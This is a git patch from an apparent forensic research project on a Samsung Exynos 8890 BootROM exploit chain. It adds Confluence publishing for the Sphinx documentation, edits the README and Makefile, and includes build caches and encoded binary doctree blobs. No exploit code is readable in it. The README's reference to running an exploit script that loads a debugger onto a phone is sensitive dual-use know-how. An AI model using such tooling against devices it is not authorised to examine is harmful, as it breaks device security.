From f431e1981f8fa9b30d0b480e97e1f587daf5dbbb Mon Sep 17 00:00:00 2001
From: Jonathan Herrewijnen <j.herrewijnen@nfi.nl>
Date: Tue, 17 Sep 2024 18:28:35 +0200
Subject: [PATCH] Adding DT_Sphinx confluence push. Fixing some errors in the
 documentation.

---
 README.md                                     |   5 +-
 .../.~lock.exynos_exploit_chain.odg#          |   1 -
 documentation/Makefile                        |   3 +
 .../confluence/.cache_confluence_config       |   1 +
 .../confluence/.cache_confluence_dochash      |   1 +
 .../confluence/.cache_confluence_publish      |   1 +
 .../.doctrees/BootROM_8890/01_start.doctree   | Bin 0 -> 12494 bytes
 .../BootROM_8890/02_frederics_exploit.doctree | Bin 0 -> 31004 bytes
 .../03_exploit_boot_chain.doctree             | Bin 0 -> 57638 bytes
 .../.doctrees/BootROM_8890/04_notes.doctree   | Bin 0 -> 27206 bytes
 .../confluence/.doctrees/environment.pickle   | Bin 0 -> 37217 bytes
 .../_build/confluence/.doctrees/index.doctree | Bin 0 -> 3941 bytes
 .../confluence/BootROM_8890/01_start.conf     |  18 ++
 .../BootROM_8890/02_frederics_exploit.conf    |  94 ++++++
 .../BootROM_8890/03_exploit_boot_chain.conf   | 281 ++++++++++++++++++
 .../confluence/BootROM_8890/04_notes.conf     | 143 +++++++++
 .../_build/confluence/_static/drawio.css      |   8 +
 documentation/_build/confluence/index.conf    | 111 +++++++
 documentation/_build/confluence/objects.inv   | Bin 0 -> 313 bytes
 ...1d7a7a3be4730c319f3413d0ce2c72099478f6.svg |   2 +
 ...eb4f45fad7676c43c34240d2094962cb034211.svg |   2 +
 documentation/exynos_exploit_chain.odg        | Bin 29120 -> 31580 bytes
 .../BootROM_8890/02_frederics_exploit.rst     |   4 +-
 .../BootROM_8890/03_exploit_boot_chain.rst    |  11 +-
 .../source/BootROM_8890/04_notes.rst          |  32 +-
 documentation/source/conf.py                  |  22 +-
 documentation/source/index.rst                |   6 +-
 source/exploit/exploit.py                     |  24 +-
 28 files changed, 725 insertions(+), 45 deletions(-)
 delete mode 100644 documentation/.~lock.exynos_exploit_chain.odg#
 create mode 100644 documentation/_build/confluence/.cache_confluence_config
 create mode 100644 documentation/_build/confluence/.cache_confluence_dochash
 create mode 100644 documentation/_build/confluence/.cache_confluence_publish
 create mode 100644 documentation/_build/confluence/.doctrees/BootROM_8890/01_start.doctree
 create mode 100644 documentation/_build/confluence/.doctrees/BootROM_8890/02_frederics_exploit.doctree
 create mode 100644 documentation/_build/confluence/.doctrees/BootROM_8890/03_exploit_boot_chain.doctree
 create mode 100644 documentation/_build/confluence/.doctrees/BootROM_8890/04_notes.doctree
 create mode 100644 documentation/_build/confluence/.doctrees/environment.pickle
 create mode 100644 documentation/_build/confluence/.doctrees/index.doctree
 create mode 100644 documentation/_build/confluence/BootROM_8890/01_start.conf
 create mode 100644 documentation/_build/confluence/BootROM_8890/02_frederics_exploit.conf
 create mode 100644 documentation/_build/confluence/BootROM_8890/03_exploit_boot_chain.conf
 create mode 100644 documentation/_build/confluence/BootROM_8890/04_notes.conf
 create mode 100644 documentation/_build/confluence/_static/drawio.css
 create mode 100644 documentation/_build/confluence/index.conf
 create mode 100644 documentation/_build/confluence/objects.inv
 create mode 100644 documentation/_build/confluence/svgs/484c133648e1cadce9ac668f651d7a7a3be4730c319f3413d0ce2c72099478f6.svg
 create mode 100644 documentation/_build/confluence/svgs/f058c2f596741fd06339c24e16eb4f45fad7676c43c34240d2094962cb034211.svg

diff --git a/README.md b/README.md
index d2c353d..7aa7434 100644
--- a/README.md
+++ b/README.md
@@ -23,4 +23,7 @@ make -f devices/samsung_s7/Makefile
 Then proceed to move the debugger to `dump/debugger.bin`. To get to work, run `source/exploit/exploit.py`. The launch.json's are located in source/exploit, so its recommended to open this folder in your VSCode/favourite IDE.
 
 ### Viewing/building documentation
-To view documentation, ensure you have sphinx installed. If not, run `sudo apt install python3-sphinx`. Then proceed to build the documentation by running `make livehtml` in `documentation`.
\ No newline at end of file
+To view documentation, ensure you have sphinx installed. If not, run `sudo apt install python3-sphinx`. Then proceed to build the documentation by running `make livehtml` in `documentation`.
+
+## Pushing documentation to confluence
+Run `sphinx-build -b confluence source _build/confluence` from documentation/ to push docs to confluence. They will appear in the DT_Sphinx space. If running issues, be sure to remove the '_build' folder and try again!
\ No newline at end of file
diff --git a/documentation/.~lock.exynos_exploit_chain.odg# b/documentation/.~lock.exynos_exploit_chain.odg#
deleted file mode 100644
index b800641..0000000
--- a/documentation/.~lock.exynos_exploit_chain.odg#
+++ /dev/null
@@ -1 +0,0 @@
-,jonathan,1kqdsx3-l,23.08.2024 11:35,file:///home/jonathan/.config/libreoffice/4;
\ No newline at end of file
diff --git a/documentation/Makefile b/documentation/Makefile
index fd09622..e93a242 100644
--- a/documentation/Makefile
+++ b/documentation/Makefile
@@ -13,6 +13,9 @@ BUILDDIR      = build
 help:
 	@$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
 
+confluence:
+	@$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" -E -a $(O)
+
 .PHONY: help Makefile
 
 livehtml:
diff --git a/documentation/_build/confluence/.cache_confluence_config b/documentation/_build/confluence/.cache_confluence_config
new file mode 100644
index 0000000..3f8d44e
--- /dev/null
+++ b/documentation/_build/confluence/.cache_confluence_config
@@ -0,0 +1 @@
+{"hash": "23bc85713aeb2ef093eda071313cc8bc57509988f49973c4234ac4d9a94cc99d"}
\ No newline at end of file
diff --git a/documentation/_build/confluence/.cache_confluence_dochash b/documentation/_build/confluence/.cache_confluence_dochash
new file mode 100644
index 0000000..71b4b78
--- /dev/null
+++ b/documentation/_build/confluence/.cache_confluence_dochash
@@ -0,0 +1 @@
+{"BootROM_8890/01_start": "646fdd9dfa95f318f95410cdd89da6f141cd2ec81a924baaa8ea4451e8a89bc0", "BootROM_8890/02_frederics_exploit": "836eaf31227b51f67d44ededc2f5bc094ecd6b536c61959ba812edb1fbedf03d", "BootROM_8890/03_exploit_boot_chain": "a45ee44296c16624fafa979a90cc1efea179119c1f765ccd6ed62a2e7448b0b4", "BootROM_8890/04_notes": "b18e488a60b63c232c39d00ba09877caff4bf846400e2c47c08fa17eba1ff0e6", "index": "b0809c6b5260a9da5c501beb8c077ab83786dbe3e371931ab45e23b93f316ec8"}
\ No newline at end of file
diff --git a/documentation/_build/confluence/.cache_confluence_publish b/documentation/_build/confluence/.cache_confluence_publish
new file mode 100644
index 0000000..bd03b57
--- /dev/null
+++ b/documentation/_build/confluence/.cache_confluence_publish
@@ -0,0 +1 @@
+{"index": "187979570", "BootROM_8890/01_start": "187979572", "BootROM_8890/02_frederics_exploit": "187979553", "BootROM_8890/03_exploit_boot_chain": "187979576", "BootROM_8890/04_notes": "187979578"}
\ No newline at end of file
diff --git a/documentation/_build/confluence/.doctrees/BootROM_8890/01_start.doctree b/documentation/_build/confluence/.doctrees/BootROM_8890/01_start.doctree
new file mode 100644
index 0000000000000000000000000000000000000000..baed073c6586a2b677adb9c6d763c3aa2a8d7b36
GIT binary patch
literal 12494
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
C$FlJN

literal 0
HcmV?d00001

diff --git a/documentation/_build/confluence/.doctrees/BootROM_8890/02_frederics_exploit.doctree b/documentation/_build/confluence/.doctrees/BootROM_8890/02_frederics_exploit.doctree
new file mode 100644
index 0000000000000000000000000000000000000000..14fe42aa64dd0e88c90887e16682b830acb9e1b0
GIT binary patch
literal 31004
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
